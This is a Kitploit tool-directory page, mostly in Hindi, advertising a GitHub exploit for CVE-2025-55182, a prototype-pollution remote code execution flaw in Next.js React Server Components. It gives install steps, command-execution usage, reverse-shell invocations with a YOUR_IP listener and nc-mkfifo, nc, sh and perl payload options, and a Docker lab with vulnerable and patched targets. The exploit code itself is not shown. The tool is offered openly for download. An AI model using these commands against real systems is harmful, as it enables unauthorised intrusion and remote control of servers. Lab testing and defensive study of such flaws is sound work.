Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — CVE-2025-55182 के लिए एक्सप्लॉइट जो Next.js React Server Components में prototype pollution के माध्यम से remote code execution सक्षम करता है, जिसमें command execution और reverse shell क्षमताएँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/mr-destroyer/cve-2025-55182
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंटलैब और अभ्यास
GitHubmr-destroyer/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 के लिए एक्सप्लॉइट जो Next.js React Server Components में prototype pollution के माध्यम से remote code execution सक्षम करता है, जिसमें command execution और reverse shell क्षमताएँ शामिल हैं।

रिपॉजिटरी देखें
1 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Next.js React सर्वर कंपोनेंट्स RCE एक्सप्लॉइट

प्रोटोटाइप प्रदूषण के माध्यम से दूरस्थ कोड निष्पादन के लिए CVE-2025-55182 का शोषण करता है।

स्थापना

root@kitploit:~
uv sync

उपयोग

कमांड निष्पादन

root@kitploit:~
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"

रिवर्स शेल

root@kitploit:~
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo

विकल्प

  • -u, --url: जाँच के लिए URL/होस्ट (आवश्यक)
  • -c, --cmd: निष्पादित करने के लिए कमांड
  • -r, --reverse: रिवर्स शेल मोड सक्षम करें
  • -l, --lhost: रिवर्स शेल के लिए लिसनर होस्ट
  • -p, --lport: रिवर्स शेल के लिए लिसनर पोर्ट
  • -P, --payload: रिवर्स शेल पेलोड प्रकार: nc, nc-mkfifo, sh, perl (डिफ़ॉल्ट: nc)
  • --timeout: सेकंडों में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10)
  • उदाहरण

    root@kitploit:~
    # Execute command
    python3 exploit.py -u https://example.com -c "whoami"
    
    # Reverse shell with nc-mkfifo (recommended for Alpine)
    python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
    

    लैब वातावरण

    lab/ निर्देशिका में एक्सप्लॉइट के परीक्षण के लिए एक संपूर्ण Docker सेटअप है।

    सेटअप

    root@kitploit:~
    cd lab
    docker-compose up -d
    

    यह दो सेवाएँ प्रारंभ करेगा:

    • vulnerable: पोर्ट 3011 पर संवेदनशील Next.js एप्लिकेशन
    • patched: पोर्ट 3012 पर पैच किया गया Next.js एप्लिकेशन

    परीक्षण

    root@kitploit:~
    # Test on vulnerable instance
    python3 exploit.py -u http://localhost:3011 -c "id"
    
    # Test reverse shell (get gateway IP first)
    GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
    python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
    
    टूल डाउनलोड करें